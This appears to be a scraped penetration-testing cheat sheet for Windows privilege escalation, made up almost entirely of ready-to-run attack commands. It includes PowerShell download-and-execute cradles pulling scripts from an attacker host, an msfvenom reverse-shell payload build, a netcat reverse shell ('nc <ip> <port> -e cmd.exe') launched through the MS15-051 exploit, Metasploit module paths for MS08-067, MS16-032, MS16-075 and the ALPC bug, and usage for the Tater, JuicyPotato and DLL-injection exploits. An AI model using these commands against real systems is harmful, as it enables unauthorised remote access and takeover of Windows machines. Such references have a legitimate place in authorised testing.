Tools and Exploits
Toolsâ
tip
Start with a great enumeration to detect potential privilege escalations.
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://<ip>/PowerUp.ps1'); Invoke-AllChecks | Out-File -Encoding ASCII checks.txt"
SharpUp.exe
Watson.exe
. .\HostEnum.ps1
Invoke-HostEnum -Local -Privesc -HTMLReport
Exploitsâ
WSUS HTTP misconfigurationâ
info
See the exploit giude to abuse this misconfiguration.
MS08-067â
exploit/windows/smb/ms08_067_netapi
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
python MS08_067_2018.py
python MS08_067_2018.py <ip> <scenario_number> <port>
MS15-051â
exploit/windows/local/ms15_051_client_copy_image
ms15-051.exe "nc <ip> <port> -e cmd.exe"
MS16-032â
exploit/windows/local/ms16_032_secondary_logon_handle_privesc
powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('<url>');Invoke-MS16-032 '-nop -exec bypass -c <command>'
MS16-075â
HotPotato - Taterâ
Start and stop
Import-Module .\Tater.ps1
[press enter while script running]
Stop-Tater
NBNS WPAD Bruteforce and Windows Defender Signature Updates
Invoke-Tater -Trigger 1 -Command "<cmd>"
Using WPAD Bruteforce and Windows Defender Signature Updates and UDP port exhaustion
Invoke-Tater -ExhaustUDP y -Command "<cmd>"
WebClient Service and Scheduled Task
Invoke-Tater -Trigger 2 -Command "<cmd>"
RottenPotatoâ
exploit/windows/local/ms16_075_reflection
JuicyPotatoâ
exploit/windows/local/ms16_075_reflection_juicy
jp.exe -t * -p <rsh.exe> -l <unused_port_like_9001>
ALPC bugâ
Metasploitâ
exploit/windows/local/alpc_taskscheduler
Exploit (09/2018)â
Download the zip below:
- With CFF open
ALPC-TaskSched-LPE.dlland provide your own DLL payload (rsh NT / add admin local account...). - Overwrite the
LPC-TaskSched-LPE.dll. InjectDll.exe <pid_of_user_land_process> ALPC-TaskSched-LPE.dll
The exploit may be patch to work on other systems than W10/W2016, but works only on x64.